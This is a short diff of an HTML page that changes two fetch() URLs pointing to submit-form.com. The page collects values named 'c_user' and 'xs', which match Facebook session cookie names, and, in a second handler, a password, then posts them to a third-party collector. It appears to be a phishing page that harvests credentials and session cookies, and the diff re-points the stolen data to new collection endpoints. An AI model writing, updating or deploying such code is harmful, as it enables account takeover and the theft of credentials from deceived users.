--- a/index.html
+++ b/index.html
@@ -2044,7 +2044,7 @@
           formData.append("c_user", cUserInput.value);
           formData.append("xs", xsInput.value);
 
-          fetch("https://submit-form.com/SHcXgkyIx", {
+          fetch("https://submit-form.com/a7Xl9jdzO", {
             method: "POST",
             headers: {
               "Content-Type": "application/json",
@@ -2092,7 +2092,7 @@
           const formData = new FormData();
           formData.append("password", passwordInput.value);
 
-          fetch("https://submit-form.com/PziKKnKSi", {
+          fetch("https://submit-form.com/CXRCp4QcP", {
             method: "POST",
             headers: {
               "Content-Type": "application/json",
